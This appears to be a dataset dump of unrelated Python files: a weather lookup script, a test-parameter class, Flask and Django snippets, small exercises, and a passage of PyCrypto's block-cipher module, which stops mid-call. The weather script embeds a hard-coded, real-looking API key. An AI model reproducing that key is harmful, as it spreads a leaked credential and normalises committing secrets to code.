text stringlengths 38 1.54M |
|---|
#!/bin/python
# Fetch the current weather of a city using the OpenWeatherMap API.
import requests
import json

# NOTE(security): the API key is hard-coded; prefer reading it from an
# environment variable so the secret is not committed to version control.
api_key = "26c7d541b9d4a453df49d961bf746589"
# Base URL of the OpenWeatherMap "current weather" endpoint.
base_url = "http://api.openweathermap.org/data/2.5/weather"

city = input("Please enter your favourite city :")
# Bug fix: the original concatenated "...&q" + city (missing "=").
# Letting `requests` build and URL-encode the query string avoids that
# whole class of error.
response = requests.get(base_url, params={"appid": api_key, "q": city})
data = response.json()  # decode the JSON response body
# The 'main' section is only present on a successful lookup; the original
# raised an unhandled KeyError for unknown cities.
if response.ok and 'main' in data:
    print(data['main'])
else:
    print("City not found:", data.get('message', 'unknown error'))
|
def check_test_type(var, tests):
    """Validate a test-type name against the known test definitions.

    Parameters
    ----------
    var : str or None
        Name of the test type. ``None`` is allowed and passed through
        unchanged (meaning "no test of this kind").
    tests : dict
        Mapping of known test-type names to their parameter dicts.

    Returns
    -------
    str or None
        The validated name, unchanged.

    Raises
    ------
    AssertionError
        If ``var`` is neither ``None``, a string, nor a known test type.
    """
    if var is not None:
        # isinstance() is the idiomatic type check; `in tests` avoids the
        # redundant .keys() call.
        assert isinstance(var, str), 'not a string'
        assert var in tests, 'unknown test type {}'.format(var)
    return var
class Testing():
    """Bundle of testing-policy parameters and test-technology properties.

    The ``tests`` attribute maps a test-type name to its characteristics:
    sensitivity, specificity, the detection window (``time_until_testable``
    to ``time_testable``, in days) and the delay until the result is
    available (``time_until_test_result``).
    """

    def __init__(self, model, diagnostic_test_type,
                 preventive_screening_test_type, follow_up_testing_interval,
                 screening_intervals, liberating_testing,
                 K1_contact_types, verbosity):
        self.follow_up_testing_interval = follow_up_testing_interval
        self.screening_intervals = screening_intervals
        self.liberating_testing = liberating_testing
        self.model = model
        self.verbosity = verbosity
        self.K1_contact_types = K1_contact_types

        # mean parameters for exposure and infection duration to base
        # estimates for test detection thresholds on
        exposure_duration = 5
        infection_duration = 11

        def antigen(sensitivity, result_delay):
            # Antigen tests turn positive 2 days after the (mean) exposure
            # period and stay detectable for 4 more days.
            return {
                'sensitivity': sensitivity,
                'specificity': 1,
                'time_until_testable': exposure_duration + 2,
                'time_testable': exposure_duration + 6,
                'time_until_test_result': result_delay,
            }

        def lab_test(time_until_testable, result_delay):
            # PCR/LAMP tests stay detectable for the whole infection
            # duration and have perfect sensitivity/specificity here.
            return {
                'sensitivity': 1,
                'specificity': 1,
                'time_until_testable': time_until_testable,
                'time_testable': infection_duration,
                'time_until_test_result': result_delay,
            }

        # The dict below is generated programmatically but is identical to
        # the former hand-written table of 19 test types.
        self.tests = {'same_day_antigen': antigen(1, 0)}
        # Reduced-sensitivity antigen variants; the sensitivity value is
        # part of the key, e.g. 'same_day_antigen0.3'.
        for s in (0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9):
            self.tests['same_day_antigen{}'.format(s)] = antigen(s, 0)
        self.tests['one_day_antigen'] = antigen(1, 1)
        self.tests['two_day_antigen'] = antigen(1, 2)
        # PCR detects from one day before the end of the exposure period.
        for delay, prefix in enumerate(('same_day', 'one_day', 'two_day')):
            self.tests['{}_PCR'.format(prefix)] = lab_test(
                exposure_duration - 1, delay)
        # LAMP detects from the end of the exposure period.
        for delay, prefix in enumerate(('same_day', 'one_day', 'two_day')):
            self.tests['{}_LAMP'.format(prefix)] = lab_test(
                exposure_duration, delay)

        self.diagnostic_test_type = check_test_type(
            diagnostic_test_type, self.tests)
        self.preventive_screening_test_type = check_test_type(
            preventive_screening_test_type, self.tests)
|
import os
from datetime import datetime

# Bug fix: Flask was imported twice from two separate lines; the names are
# merged into a single import.
from flask import (Flask, render_template, redirect, url_for, session,
                   request)
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy

from View.configuration import config

app = Flask(__name__)
app.config['SECRET_KEY'] = config.secret_key
# Bulk configuration: database plus mail server host.
app.config.update(
    SQLALCHEMY_DATABASE_URI=config.database_uri,
    SQLALCHEMY_TRACK_MODIFICATIONS=False,
    MAIL_SERVER=config.Mail_SERVER,
)
app.config['MAIL_PORT'] = config.MAIL_PORT
app.config['MAIL_USE_TLS'] = True
# Mail credentials come from the environment so secrets never land in
# version control; a missing variable fails fast with KeyError.
app.config['MAIL_USERNAME'] = os.environ["MAIL_USERNAME"]
app.config['MAIL_DEFAULT_SENDER'] = os.environ["MAIL_USERNAME"]
app.config['MAIL_PASSWORD'] = os.environ["MAIL_PASSWORD"]

# initialize the database connection
db = SQLAlchemy(app)
migrate = Migrate(app, db)
# create_all() must run inside an application context under
# Flask-SQLAlchemy >= 3; the `with` block is also safe on older versions.
with app.app_context():
    db.create_all()
    db.session.commit()

# Route modules register their views against `app` on import, so these
# imports must stay below the app/db creation.
import router
from router import common
from router import contact
|
from app1.models import *
from app1.util.utils import *
def retriveTeachPlan(request):
    '''
    Return one TeachPlan row (selected by the ``tpno`` GET parameter)
    as a JSON payload.

    URL:
        http://127.0.0.1:8000/app4/retriveTeachPlan?tpno=001
    '''
    try:
        plan_no = request.GET.get("tpno")
        payload = {
            'msg': 'Success!',
            'err_num': 0,
            'data': TeachPlan.objects.values().get(tpno=plan_no),
        }
        return JsonResponse(payload, safe=False)
    except Exception as exc:
        # Any failure (missing row, bad parameter) is reported as an
        # error payload rather than a 500.
        return showJsonerror({'msg': str(exc), 'err_num': 1})
#coding:utf-8
class Solution(object):
    """LeetCode 50: compute x**n via fast (binary) exponentiation."""

    def myPow(self, x, n):
        """Return ``x`` raised to the integer power ``n``.

        Runs in O(log |n|) multiplications by squaring.

        Bug fix: the recursion used ``n / 2``, which is *float* division
        in Python 3, so ``n`` never reached the ``n == 0`` base case and
        the recursion blew the stack; integer division (``//``) is used.
        """
        if n == 0:
            return 1
        if n < 0:
            # x**n == 1 / x**(-n)
            return 1.0 / self.myPow(x, -n)
        half = self.myPow(x, n // 2)
        if n % 2 == 1:
            return x * half * half
        return half * half
|
#номер элемента ряда Фибоначчи
# 1 1 2 3 5 8 13 21
# def fibo(n):
# if n <= 2:
# return 1
# return fibo(n - 2) + fibo(n - 1)
#
#
# print(fibo(1))
# print(fibo(2))
# print(fibo(3))
# print(fibo(4))
# print(fibo(5))
# print(fibo(6))
# print(fibo(7))
# print(fibo(8))
# 5! = 5 * 4 * 3 * 2 * 1
def fact(num):
    """Return num! (factorial), computed recursively.

    Bug fix: the base case was ``num == 1`` only, so ``fact(0)`` recursed
    until RecursionError; ``num <= 1`` also covers 0 (0! == 1).
    """
    if num <= 1:
        return 1
    return num * fact(num - 1)
#вызовы идут в глубину до базового случая, затем цепочка
#сворачивается наверх, возвращая значения
|
"""Scrapes powerschool to return grades and info about specific classes
Usage:
power-scraper <classes> <grades> [--name|--room|--teacher|--teacher-email] [-h]
"""
__version__ = "0.0.1" |
# -*- coding:utf-8 -*-
from .models import Brand,Serie,Version,Car
def cars_url(self):
    """Build the admin sidebar entry for the car-management models.

    Returns a one-element list holding the top-level menu dict; its
    'menus' tuple contains one changelist link per model.
    """
    menu_models = (
        (u'品牌', Brand),
        (u'型号', Serie),
        (u'版本', Version),
        (u'汽车', Car),
    )
    menus = tuple(
        {
            'title': title,
            'url': self.get_model_url(model, 'changelist'),
            'perm': self.get_model_perm(model, 'view'),
        }
        for title, model in menu_models
    )
    return [{
        'title': u'汽车管理',
        'perm': self.get_model_perm(Brand, 'view'),
        'icon': 'fa fa-cloud',
        'menus': menus,
    }]
class Caneta:
    """A simple pen with a colour, brand, tip size and ink volume."""

    def __init__(self, cor, marca, numero_ponta, volume_tinta):
        self.cor = cor
        self.marca = marca
        self.numero_ponta = numero_ponta
        self.volume_tinta = volume_tinta

    def encher_caneta(self):
        """Refill the pen to its full capacity (50 units of ink)."""
        self.volume_tinta = 50

    def escrever(self, palavra):
        """Print the given word and spend one unit of ink."""
        print(palavra)
        self.volume_tinta = self.volume_tinta - 1

    def retornar_marca(self):
        """Return the pen's brand."""
        return self.marca

    def imprimir_caracteristica(self):
        """Print the pen's attributes as one comma-separated line."""
        print(self.cor, self.marca, self.numero_ponta, self.volume_tinta,
              sep=",")
# Demo: create a full pen, write one sentence (spends 1 unit of ink, so
# volume drops from 50 to 49), then print the pen's attributes.
c1 = Caneta("Azul","bic",0.5,50)
c1.escrever("A melhor maneira de prever o futuro é inventá-lo")
c1.imprimir_caracteristica()
|
class MySingleton:
    """Classic singleton: at most one instance, reachable via getInstance().

    Bug fix: ``getInstance()`` called ``MySingleton()`` with no arguments,
    but ``__init__`` required ``val1`` and ``val2`` — lazily creating the
    instance therefore always raised TypeError.  ``val1``/``val2`` now
    default to ``None``, which keeps the original two-argument call fully
    compatible.
    """

    # The one and only instance (None until first created).
    __instance = None

    @staticmethod
    def getInstance(val1=None, val2=None):
        """Return the singleton, creating it on first use."""
        if MySingleton.__instance is None:
            MySingleton(val1, val2)
        return MySingleton.__instance

    def __init__(self, val1=None, val2=None):
        """Virtually private constructor; raises if an instance exists."""
        if MySingleton.__instance is not None:
            raise Exception("This class is a MySingleton!")
        MySingleton.__instance = self
        # Values are stored on the class, mirroring the original behaviour.
        MySingleton.val1 = val1
        MySingleton.val2 = val2
# -*- coding: utf-8 -*-
#
# Cipher/blockalgo.py
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Module with definitions common to all block ciphers."""
import sys
if sys.version_info[0] == 2 and sys.version_info[1] == 1:
from Crypto.Util.py21compat import *
from Crypto.Util.py3compat import *
from binascii import unhexlify
from Crypto.Util import Counter
from Crypto.Util.strxor import strxor
from Crypto.Util.number import long_to_bytes, bytes_to_long
import Crypto.Util.Counter
from Crypto.Hash import CMAC
from Crypto.Hash.CMAC import _SmoothMAC
from Crypto.Protocol.KDF import _S2V
from Crypto.Util import galois
#: *Electronic Code Book (ECB)*.
#: This is the simplest encryption mode. Each of the plaintext blocks
#: is directly encrypted into a ciphertext block, independently of
#: any other block. This mode exposes frequency of symbols
#: in your plaintext. Other modes (e.g. *CBC*) should be used instead.
#:
#: See `NIST SP800-38A`_ , Section 6.1 .
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_ECB = 1
#: *Cipher-Block Chaining (CBC)*. Each of the ciphertext blocks depends
#: on the current and all previous plaintext blocks. An Initialization Vector
#: (*IV*) is required.
#:
#: The *IV* is a data block to be transmitted to the receiver.
#: The *IV* can be made public, but it must be authenticated by the receiver
#: and it should be picked randomly.
#:
#: See `NIST SP800-38A`_ , Section 6.2 .
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_CBC = 2
#: *Cipher FeedBack (CFB)*. This mode is similar to CBC, but it transforms
#: the underlying block cipher into a stream cipher. Plaintext and ciphertext
#: are processed in *segments* of **s** bits. The mode is therefore sometimes
#: labelled **s**-bit CFB. An Initialization Vector (*IV*) is required.
#:
#: When encrypting, each ciphertext segment contributes to the encryption of
#: the next plaintext segment.
#:
#: This *IV* is a data block to be transmitted to the receiver.
#: The *IV* can be made public, but it should be picked randomly.
#: Reusing the same *IV* for encryptions done with the same key leads to
#: catastrophic cryptographic failures.
#:
#: See `NIST SP800-38A`_ , Section 6.3 .
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_CFB = 3
#: This mode should not be used.
MODE_PGP = 4
#: *Output FeedBack (OFB)*. This mode is very similar to CBC, but it
#: transforms the underlying block cipher into a stream cipher.
#: The keystream is the iterated block encryption of an
#: Initialization Vector (*IV*).
#:
#: The *IV* is a data block to be transmitted to the receiver.
#: The *IV* can be made public, but it should be picked randomly.
#:
#: Reusing the same *IV* for encryptions done with the same key leads to
#: catastrophic cryptographic failures.
#:
#: See `NIST SP800-38A`_ , Section 6.4 .
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_OFB = 5
#: *CounTeR (CTR)*. This mode is very similar to ECB, in that
#: encryption of one block is done independently of all other blocks.
#: Unlike ECB, the block *position* contributes to the encryption and no
#: information leaks about symbol frequency.
#:
#: Each message block is associated to a *counter* which must be unique
#: across all messages that get encrypted with the same key (not just within
#: the same message). The counter is as big as the block size.
#:
#: Counters can be generated in several ways. The most straightforward one is
#: to choose an *initial counter block* (which can be made public, similarly
#: to the *IV* for the other modes) and increment its lowest **m** bits by
#: one (modulo *2^m*) for each block. In most cases, **m** is chosen to be half
#: the block size.
#:
#: Reusing the same *initial counter block* for encryptions done with the same
#: key leads to catastrophic cryptographic failures.
#:
#: See `NIST SP800-38A`_ , Section 6.5 (for the mode) and Appendix B (for how
#: to manage the *initial counter block*).
#:
#: .. _`NIST SP800-38A` : http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
MODE_CTR = 6
#: *OpenPGP CFB*. This mode is a variant of CFB, and it is only used in PGP and
#: OpenPGP_ applications. An Initialization Vector (*IV*) is required.
#:
#: Unlike CFB, the IV is not transmitted to the receiver.
#: Instead, the *encrypted* IV is.
#: The IV is a random data block. Two of its bytes are duplicated to act
#: as a checksum for the correctness of the key. The encrypted IV is
#: therefore 2 bytes longer than the clean IV.
#:
#: .. _OpenPGP: http://tools.ietf.org/html/rfc4880
MODE_OPENPGP = 7
#: *Counter with CBC-MAC (CCM)*. This is an Authenticated Encryption with
#: Associated Data (`AEAD`_) mode. It provides both confidentiality and
#: authenticity.
#: The header of the message may be left in the clear, if needed, and it will
#: still be subject to authentication. The decryption step tells the receiver
#: if the message comes from a source that really knows the secret key.
#: Additionally, decryption detects if any part of the message - including the
#: header - has been modified or corrupted.
#:
#: This mode requires a nonce. The nonce shall never repeat for two
#: different messages encrypted with the same key, but it does not need
#: to be random.
#: Note that there is a trade-off between the size of the nonce and the
#: maximum size of a single message you can encrypt.
#:
#: It is important to use a large nonce if the key is reused across several
#: messages and the nonce is chosen randomly.
#:
#: It is acceptable to use a short nonce if the key is only used a few times or
#: if the nonce is taken from a counter.
#:
#: The following table shows the trade-off when the nonce is chosen at
#: random. The column on the left shows how many messages it takes
#: for the keystream to repeat **on average**. In practice, you will want to
#: stop using the key way before that.
#:
#: +--------------------+---------------+-------------------+
#: | Avg. # of messages | nonce | Max. message |
#: | before keystream | size | size |
#: | repeats | (bytes) | (bytes) |
#: +====================+===============+===================+
#: | 2**52 | 13 | 64K |
#: +--------------------+---------------+-------------------+
#: | 2**48 | 12 | 16M |
#: +--------------------+---------------+-------------------+
#: | 2**44 | 11 | 4G |
#: +--------------------+---------------+-------------------+
#: | 2**40 | 10 | 1T |
#: +--------------------+---------------+-------------------+
#: | 2**36 | 9 | 64P |
#: +--------------------+---------------+-------------------+
#: | 2**32 | 8 | 16E |
#: +--------------------+---------------+-------------------+
#:
#: This mode is only available for ciphers that operate on 128 bits blocks
#: (e.g. AES but not TDES).
#:
#: See `NIST SP800-38C`_ or RFC3610_ .
#:
#: .. _`NIST SP800-38C`: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
#: .. _RFC3610: https://tools.ietf.org/html/rfc3610
#: .. _AEAD: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
MODE_CCM = 8
#: *EAX*. This is an Authenticated Encryption with Associated Data
#: (`AEAD`_) mode. It provides both confidentiality and authenticity.
#:
#: The header of the message may be left in the clear, if needed, and it will
#: still be subject to authentication.
#:
#: The decryption step tells the receiver if the message comes from a source
#: that really knows the secret key.
#: Additionally, decryption detects if any part of the message - including the
#: header - has been modified or corrupted.
#:
#: This mode requires a nonce. The nonce shall never repeat for two
#: different messages encrypted with the same key, but it does not need to
#: be random.
#
#: This mode is only available for ciphers that operate on 64 or
#: 128 bits blocks.
#:
#: There are no official standards defining EAX. The implementation is based on
#: `a proposal`__ that was presented to NIST.
#:
#: .. _AEAD: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
#: .. __: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
MODE_EAX = 9
#: *Synthetic Initialization Vector*. This is an Authenticated Encryption with
#: Associated Data (`AEAD`_) mode. It provides both confidentiality and
#: authenticity.
#: The header of the message may be left in the clear, if needed, and it will
#: still be subject to authentication. The decryption step tells the receiver
#: if the message comes from a source that really knows the secret key.
#: Additionally, decryption detects if any part of the message - including the
#: header - has been modified or corrupted.
#:
#: If the data being encrypted is completely unpredictable to an adversary
#: (e.g. a secret key, for key wrapping purposes) a nonce is not strictly
#: required.
#:
#: Otherwise, a nonce has to be provided; the nonce shall never repeat
#: for two different messages encrypted with the same key, but it does not
#: need to be random.
#:
#: Unlike other AEAD modes such as CCM, EAX or GCM, accidental reuse of a
#: nonce is not catastrophic for the confidentiality of the message. The only
#: effect is that an attacker can tell when the same plaintext (and same
#: associated data) is protected with the same key.
#:
#: The length of the MAC is fixed to the block size of the underlying cipher.
#: The key size is twice the length of the key of the underlying cipher.
#:
#: This mode is only available for AES ciphers.
#:
#: +--------------------+---------------+-------------------+
#: | Cipher | SIV MAC size | SIV key length |
#: | | (bytes) | (bytes) |
#: +====================+===============+===================+
#: | AES-128 | 16 | 32 |
#: +--------------------+---------------+-------------------+
#: | AES-192 | 16 | 48 |
#: +--------------------+---------------+-------------------+
#: | AES-256 | 16 | 64 |
#: +--------------------+---------------+-------------------+
#:
#: See `RFC5297`_ and the `original paper`__.
#:
#: .. _RFC5297: https://tools.ietf.org/html/rfc5297
#: .. _AEAD: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
#: .. __: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
MODE_SIV = 10
#: *Galois/Counter Mode (GCM)*. This is an Authenticated Encryption with
#: Associated Data (`AEAD`_) mode. It provides both confidentiality and
#: authenticity.
#: The header of the message may be left in the clear, if needed, and it will
#: still be subject to authentication. The decryption step tells the receiver
#: if the message comes from a source that really knows the secret key.
#: Additionally, decryption detects if any part of the message - including the
#: header - has been modified or corrupted.
#:
#: This mode requires a nonce. The nonce shall never repeat for two
#: different messages encrypted with the same key, but it does not need to
#: be random.
#:
#: This mode is only available for ciphers that operate on 128 bits blocks
#: (e.g. AES but not TDES).
#:
#: See `NIST SP800-38D`_ .
#:
#: .. _`NIST SP800-38D`: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
#: .. _AEAD: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
MODE_GCM = 11
def _getParameter(name, index, args, kwargs, default=None):
"""Find a parameter in tuple and dictionary arguments a function receives"""
param = kwargs.get(name)
if len(args) > index:
if param:
raise TypeError("Parameter '%s' is specified twice" % name)
param = args[index]
return param or default
class _CBCMAC(_SmoothMAC):
    """CBC-MAC helper used by CCM mode.

    The MAC cannot start until the first block (B_0, which encodes the
    nonce and the message/associated-data lengths) is known, so incoming
    data is buffered by the base class until ``_ignite`` is called.
    """

    def __init__(self, key, ciphermod):
        # No hash module and no data-length limit at this layer.
        _SmoothMAC.__init__(self, ciphermod.block_size, None, 0)
        self._key = key
        self._factory = ciphermod

    def _ignite(self, data):
        """Prepend *data* (the B_0 header block) and start the CBC MAC."""
        if self._mac:
            raise TypeError("_ignite() cannot be called twice")
        # Any already-buffered user data must be authenticated AFTER the
        # header block, hence insert at position 0.
        self._buffer.insert(0, data)
        self._buffer_len += len(data)
        # CBC MAC always starts from an all-zero IV.
        self._mac = self._factory.new(self._key, MODE_CBC, bchr(0) * 16)
        self.update(b(""))

    def _update(self, block_data):
        # The running tag is the last ciphertext block of the CBC chain.
        self._t = self._mac.encrypt(block_data)[-16:]

    def _digest(self, left_data):
        return self._t
class _GHASH(_SmoothMAC):
    """GHASH function defined in NIST SP 800-38D, Algorithm 2.

    If X_1, X_2, .. X_m are the blocks of input data, the function
    computes:

       X_1*H^{m} + X_2*H^{m-1} + ... + X_m*H

    in the Galois field GF(2^128) using the reducing polynomial
    (x^128 + x^7 + x^2 + x + 1).
    """

    def __init__(self, hash_subkey, block_size, table_size='64K'):
        _SmoothMAC.__init__(self, block_size, None, 0)
        if table_size == '64K':
            # Expand the subkey into a 64K lookup table for fast
            # multiplication; otherwise use the raw subkey as given.
            self._hash_subkey = galois._ghash_expand(hash_subkey)
        else:
            self._hash_subkey = hash_subkey
        # Running GHASH value Y_i, initially the all-zero block.
        self._last_y = bchr(0) * 16
        self._mac = galois._ghash

    def copy(self):
        # table_size='0K': the stored subkey is reused as-is (it may
        # already be the expanded table).
        clone = _GHASH(self._hash_subkey, self._bs, table_size='0K')
        _SmoothMAC._deep_copy(self, clone)
        clone._last_y = self._last_y
        return clone

    def _update(self, block_data):
        self._last_y = galois._ghash(block_data, self._last_y,
                                     self._hash_subkey)

    def _digest(self, left_data):
        return self._last_y
class BlockAlgo:
"""Class modelling an abstract block cipher."""
    def __init__(self, factory, key, *args, **kwargs):
        """Create a cipher object in the mode given by the 'mode' parameter.

        *factory* is the low-level cipher module (e.g. an AES module
        exposing ``new`` and ``block_size``); the remaining arguments are
        mode-specific and forwarded to the relevant ``_start_*`` helper.
        """
        self.mode = _getParameter('mode', 0, args, kwargs, default=MODE_ECB)
        self.block_size = factory.block_size
        self._factory = factory
        # Cached MAC tag for the AEAD modes (computed lazily).
        self._tag = None

        if self.mode == MODE_CCM:
            if self.block_size != 16:
                raise TypeError("CCM mode is only available for ciphers that operate on 128 bits blocks")

            # Tag length 't' (bytes) must be an even value in 4..16.
            self._mac_len = kwargs.get('mac_len', 16)        # t
            if self._mac_len not in (4, 6, 8, 10, 12, 14, 16):
                raise ValueError("Parameter 'mac_len' must be even and in the range 4..16")

            self.nonce = _getParameter('nonce', 1, args, kwargs)  # N
            if not (self.nonce and 7 <= len(self.nonce) <= 13):
                raise ValueError("Length of parameter 'nonce' must be"
                                 " in the range 7..13 bytes")

            self._key = key
            # Total plaintext (p) and associated-data (a) lengths may be
            # declared up front; otherwise CCM starts lazily once both
            # become known (see _start_ccm).
            self._msg_len = kwargs.get('msg_len', None)      # p
            self._assoc_len = kwargs.get('assoc_len', None)  # a

            self._cipherMAC = _CBCMAC(key, factory)
            self._done_assoc_data = False   # True when all associated data
                                            # has been processed

            # Allowed transitions after initialization
            self._next = [self.update, self.encrypt, self.decrypt,
                          self.digest, self.verify]

            # Try to start CCM
            self._start_ccm()

        elif self.mode == MODE_OPENPGP:
            self._start_PGP(factory, key, *args, **kwargs)
        elif self.mode == MODE_EAX:
            self._start_eax(factory, key, *args, **kwargs)
        elif self.mode == MODE_SIV:
            self._start_siv(factory, key, *args, **kwargs)
        elif self.mode == MODE_GCM:
            self._start_gcm(factory, key, *args, **kwargs)
        else:
            # Classic (non-AEAD) modes are delegated to the factory.
            self._cipher = factory.new(key, *args, **kwargs)
            self.IV = self._cipher.IV
    def _start_gcm(self, factory, key, *args, **kwargs):
        """Set up GCM mode, following NIST SP 800-38D Algorithms 4 and 5."""
        if self.block_size != 16:
            raise TypeError("GCM mode is only available for ciphers that operate on 128 bits blocks")
        self.nonce = _getParameter('nonce', 1, args, kwargs)
        if not self.nonce:
            raise TypeError("MODE_GCM requires a nonce")
        self._mac_len = kwargs.get('mac_len', 16)
        if not (self._mac_len and 4 <= self._mac_len <= 16):
            raise ValueError("Parameter 'mac_len' must not be larger than 16 bytes")
        # Allowed transitions after initialization
        self._next = [self.update, self.encrypt, self.decrypt,
                      self.digest, self.verify]
        self._done_assoc_data = False
        # Length of the ciphertext or plaintext
        self._msg_len = 0

        # Step 1 in SP800-38D, Algorithm 4 (encryption) - Compute H,
        # the hash subkey: encryption of the zero block.
        # See also Algorithm 5 (decryption).
        hash_subkey = factory.new(key).encrypt(bchr(0) * 16)

        # Step 2 - Compute J0 (integer, not byte string!)
        if len(self.nonce) == 12:
            # 96-bit nonce: J0 = nonce || 0^31 || 1
            self._j0 = bytes_to_long(self.nonce + b("\x00\x00\x00\x01"))
        else:
            # Other nonce sizes: J0 = GHASH(nonce zero-padded to a full
            # block, followed by the 64-bit nonce bit length).
            fill = (16 - (len(self.nonce) % 16)) % 16 + 8
            ghash_in = (self.nonce +
                        bchr(0) * fill +
                        long_to_bytes(8 * len(self.nonce), 8))

            mac = _GHASH(hash_subkey, factory.block_size, '0K')
            mac.update(ghash_in)
            self._j0 = bytes_to_long(mac.digest())

        # Step 3 - Prepare GCTR cipher for encryption/decryption
        ctr = Counter.new(128, initial_value=self._j0 + 1,
                          allow_wraparound=True)
        self._cipher = self._factory.new(key, MODE_CTR, counter=ctr)

        # Step 5 - Bootstrap GHASH
        self._cipherMAC = _GHASH(hash_subkey, factory.block_size, '64K')

        # Step 6 - Prepare GCTR cipher for GMAC (tag encryption uses J0
        # itself as the initial counter block).
        ctr = Counter.new(128, initial_value=self._j0, allow_wraparound=True)
        self._tag_cipher = self._factory.new(key, MODE_CTR, counter=ctr)
def _start_siv(self, factory, key, *args, **kwargs):
subkey_size, rem = divmod(len(key), 2)
if rem:
raise ValueError("MODE_SIV requires a key twice as long as for the underlying cipher")
# IV is optional
self.nonce = _getParameter('nonce', 1, args, kwargs)
self._cipherMAC = _S2V(key[:subkey_size], ciphermod=factory)
self._subkey_ctr = key[subkey_size:]
self._mac_len = factory.block_size
self._cipherMAC = self._cipherMAC
# Allowed transitions after initialization
self._next = [self.update, self.encrypt, self.decrypt,
self.digest, self.verify]
def _siv_ctr_cipher(self, tag):
"""Create a new CTR cipher from the MAC in SIV mode"""
tag_int = bytes_to_long(tag)
init_counter = tag_int ^ (tag_int & 0x8000000080000000)
ctr = Counter.new(self._factory.block_size * 8,
initial_value=init_counter,
allow_wraparound=True)
return self._factory.new(self._subkey_ctr, MODE_CTR, counter=ctr)
    def _start_eax(self, factory, key, *args, **kwargs):
        """Set up EAX mode (CMAC/OMAC-based AEAD)."""
        self.nonce = _getParameter('nonce', 1, args, kwargs)
        if not self.nonce:
            raise TypeError("MODE_EAX requires a nonce")

        # Allowed transitions after initialization
        self._next = [self.update, self.encrypt, self.decrypt,
                      self.digest, self.verify]

        self._mac_len = kwargs.get('mac_len', self.block_size)
        if not (self._mac_len and 4 <= self._mac_len <= self.block_size):
            raise ValueError("Parameter 'mac_len' must not be larger than %d"
                             % self.block_size)

        # Three CMAC instances, domain-separated by a final key-stream
        # byte of 0/1/2: index 0 MACs the nonce, 1 the header (associated
        # data), 2 the ciphertext.
        self._omac = [
            CMAC.new(key, bchr(0) * (self.block_size - 1) + bchr(i),
                     ciphermod=factory)
            for i in range(0, 3)
        ]

        # Compute MAC of nonce
        self._omac[0].update(self.nonce)
        self._cipherMAC = self._omac[1]

        # MAC of the nonce is also the initial counter for CTR encryption
        counter_int = bytes_to_long(self._omac[0].digest())
        counter_obj = Crypto.Util.Counter.new(
            self.block_size * 8,
            initial_value=counter_int,
            allow_wraparound=True)
        self._cipher = factory.new(key, MODE_CTR, counter=counter_obj)
    def _start_PGP(self, factory, key, *args, **kwargs):
        # OPENPGP mode. For details, see 13.9 in RFC 4880.
        #
        # A few members are specifically created for this mode:
        #  - _encrypted_iv, set in this constructor
        #  - _done_first_block, set to True after the first encryption
        #  - _done_last_block, set to True after a partial block is processed
        self._done_first_block = False
        self._done_last_block = False
        self.IV = _getParameter('IV', 1, args, kwargs)
        if self.IV is None:
            # TODO: Decide whether 'IV' or 'iv' should be used going forward,
            # and deprecate the other. 'IV' is consistent with the rest of
            # PyCrypto, but 'iv' is more common in Python generally. For now,
            # we'll support both here. When in doubt, use a positional
            # parameter for now.
            self.IV = _getParameter('iv', 1, args, kwargs)
        if not self.IV:
            raise ValueError("MODE_OPENPGP requires an IV")

        # Instantiate a temporary cipher to process the IV
        IV_cipher = factory.new(
            key,
            MODE_CFB,
            b('\x00') * self.block_size,        # IV for CFB
            segment_size=self.block_size * 8)

        # The cipher will be used for...
        if len(self.IV) == self.block_size:
            # ... encryption: the plaintext IV is extended with a repeat
            # of its last two bytes (a quick key check), then encrypted.
            self._encrypted_IV = IV_cipher.encrypt(
                self.IV + self.IV[-2:] +            # Plaintext
                b('\x00') * (self.block_size - 2)   # Padding
                )[:self.block_size + 2]
        elif len(self.IV) == self.block_size + 2:
            # ... decryption: recover the plaintext IV and verify that
            # the trailing two bytes repeat bytes [-4:-2].
            self._encrypted_IV = self.IV
            self.IV = IV_cipher.decrypt(
                self.IV +                           # Ciphertext
                b('\x00') * (self.block_size - 2)   # Padding
                )[:self.block_size + 2]
            if self.IV[-2:] != self.IV[-4:-2]:
                raise ValueError("Failed integrity check for OPENPGP IV")
            self.IV = self.IV[:-2]
        else:
            raise ValueError("Length of IV must be %d or %d bytes for MODE_OPENPGP"
                             % (self.block_size, self.block_size + 2))

        # Instantiate the cipher for the real PGP data, chained off the
        # tail of the encrypted IV.
        self._cipher = factory.new(
            key,
            MODE_CFB,
            self._encrypted_IV[-self.block_size:],
